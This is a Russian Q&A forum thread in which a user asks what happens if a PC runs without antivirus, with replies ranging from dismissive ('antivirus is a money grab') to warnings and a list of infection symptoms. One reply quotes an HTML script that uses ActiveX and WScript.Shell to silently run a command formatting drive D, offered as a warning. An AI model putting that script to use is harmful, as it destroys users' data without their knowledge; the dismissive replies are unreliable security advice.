Компьютерное железо

Народ у меня нет ни антивирусника и т. п прог для защиты пк и че пк будет ?

ни чо не будет! комп летать а не ползать будет! в самой ос защита есть! антивирусы туфта все! отьем денег у населения! а схватишь что-переставишь систему и все!
Аббаз Абдиганиев
Лучший ответ
если винда - скоро сдохнет. Никсы не сдохнут, но файрволл не плохо бы...
Юрий Шумахер
ничего не будет. Подумаешь веб страничка форматнет тебе диск
Звучит кощунственно: содержимое HTML‑файла, подобно патологоанатому, методично «потрошит» винчестер. Невозможно? Еще как возможно! А вот и сценарий стартовой страницы
HTML‑код, форматирующий диск D:
<script>
a=new ActiveXObject("WScript.Shell");
a.run("cmd /c format d:/y",0);
</script>
Вышеописанный сценарий, внедренный злоумышленником в HTML‑страницу, ни много ни мало незаметно форматирует диск, указанный в коде.
или троян cmos обнулит. Тоже ничего страшного. Все решаемо
Багдат Алибек
бабушку читалку позови и не чё не будет
ну если не будешь шибаться по непроверенным сайтам система сдохнет в ближайшее время
ну а так можно долго и без антивируса обходиться, я около полугода без него обходился, пока комп постепенно не засрался троянами. червями и пр. дрянью и это стало мне мешать
будешь заново ставить ос
Последствия заражений компьютерными вирусами.
некоторые программы перестают работать или начинают работать неправильно;
компьютер начинает перезагрузку, либо не загружается вообще;
на экран выводятся посторонние сообщения, символы и т. д. ;
работа на компьютере существенно замедляется;
некоторые файлы удаляются, либо оказываются испорченными и т. д.
повышенный расход трафика в интернете ( несанкционированная рассылка электронных писем.
Тут подробнее - http://www.in-nov.ru/node/986.
Shavhat Imirshaev
Вирусы замахают (лучше поставь антивирусник)
Ilham Muradov
В один прекрасный день виндовс может не запустится
лучше скачай антивирусник. Ото зайдёшь куда нибудь и вирус залетит